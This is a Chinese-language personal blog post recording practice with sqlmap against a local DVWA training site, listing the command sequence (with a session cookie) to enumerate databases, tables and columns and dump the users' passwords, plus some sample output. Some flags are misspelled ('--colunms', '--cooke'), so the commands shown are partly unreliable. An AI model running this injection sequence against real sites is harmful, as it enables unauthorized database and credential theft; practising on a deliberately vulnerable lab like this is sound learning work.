大晚上失眠了于是来写博客
你为啥这么勤奋
白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。
low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大
爆破库名
由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这边要还要提交 cookie的值。 通过burpsuite截取包裹,我们发现我们包裹的cookie是
--cookie="security=impossible; security=low; Phpstorm-1c732ebb=8670e59f-a605-41f8-ad48-cfe0c5467ac0;PHPSESSID=ejq8q5fgjdcshgej49de1q2557"
这就是我说的不太对的地方了,明明设置成了low,可是cookie里面居然还提交了impossible,还有这个phpstrom是啥东西。。。我phpstorm开都没有开啊。
所以这正常的应该是这样子的。
--cooke="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557"
好了,然后我们打开sqlmap 输入
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" --dbs
不是很推荐用默认YES的选项,可能会错过一些很关键的操作,但是比较懒的话,还是加上 –batch吧
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
爆破表
倒完之后呢,接下来进入 爆破表
输入代码
记住 -D 与 –tables 使用 tables不是列表的意思么。
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa --tables
爆破列
爆破列
记住 -T 和 –colunms 结合使用 colunms不就是列么?
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users --colunms
爆破字段
爆破字段
记住 -C 和 –dump 结合使用 dump就是倾倒的意思嘛~~
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C password,users --dump
然后就找到密码了。
一般都是这个流程。
写篇博文过一下知识点,这些流程网上其实都找得到的。
2018年1月10日04:54:57
烧包
哇,再过一个小时就可以去晨跑了